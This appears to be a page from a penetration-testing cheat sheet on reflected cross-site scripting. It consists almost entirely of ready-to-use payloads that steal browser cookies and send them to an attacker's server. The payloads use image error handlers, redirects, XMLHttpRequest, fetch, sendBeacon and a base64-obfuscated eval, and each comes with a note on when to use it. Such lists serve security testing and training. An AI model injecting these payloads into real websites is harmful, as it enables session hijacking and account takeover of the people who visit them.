XSS

Cross-site Scripting

Methodology

Reflected XSS

Stealing Cookies

Key Condition -> HttpOnly needs to be set to false

  • Use when injecting into an image tag where an error event triggers(HTTP response error or broken link):

<img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie>

  • Use when you can inject an image and trigger a redirect via the onerror event(load error):

<img src=x onerror="location.href='http://<YOUR_SERVER_IP>/?c='+ document.cookie">

  • Use in situations where you can send cookies via an image request (URL encoding):

<script>new Image().src="http://<IP>/?c="+encodeURI(document.cookie);</script>

  • Use when you need to send cookies using an audio object:

<script>new Audio().src="http://<IP>/?c="+escape(document.cookie);</script>

  • Use when you want to redirect the user to a server with the cookies attached:

<script>location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>

  • Similar to the previous one; use when you want to redirect:

<script>location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>

  • Use in scenarios where you can modify the document.location and send cookies:

<script>document.location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>

  • Inject when you need to send cookies via document.location.href and trigger a redirect:

<script>document.location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>

  • Use to dynamically write an image that sends cookies:

<script>document.write('<img src="http://<YOUR_SERVER_IP>?c='+document.cookie+'" />')</script>

  • Use when you need to assign a location redirect with cookies:

<script>window.location.assign('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>

  • Similar to the previous one, use when you need to access window.location properties dynamically:

<script>window['location']['assign']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>

  • Use when you need to modify window.location.href dynamically:

<script>window['location']['href']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>

  • Use when you can dynamically join the URL and cookies to redirect:

<script>document.location=["http://<YOUR_SERVER_IP>?c",document.cookie].join()</script>

  • Use when you can send cookies using an image object:

<script>var i=new Image(); i.src="http://10.10.14.6/?c="+document.cookie;</script>

  • Use when you need to redirect with concatenation of cookies into a URL:

<script>window.location="https://<SERVER_IP>/?c=".concat(document.cookie)</script>

  • Use in scenarios where you can send cookies via an XMLHttpRequest:

<script>var xhttp=new XMLHttpRequest();xhttp.open("GET", "http://<SERVER_IP>/?c="%2Bdocument.cookie, true);xhttp.send();</script>

  • Use when you can inject base64-encoded JavaScript and execute it to send cookies:

<script>eval(atob('ZG9jdW1lbnQud3JpdGUoIjxpbWcgc3JjPSdodHRwczovLzxTRVJWRVJfSVA+P2M9IisgZG9jdW1lbnQuY29va2llICsiJyAvPiIp'));</script>

  • Use when you need to send cookies via fetch with no-cors mode to avoid response handling:

<script>fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body:document.cookie});</script>

  • Use when you want to send cookies asynchronously in the background using the sendBeacon API, typically for stealthier attacks.

<script>navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.cookie)</script>

PreviousMain TechniquesNextIDOR

Last updated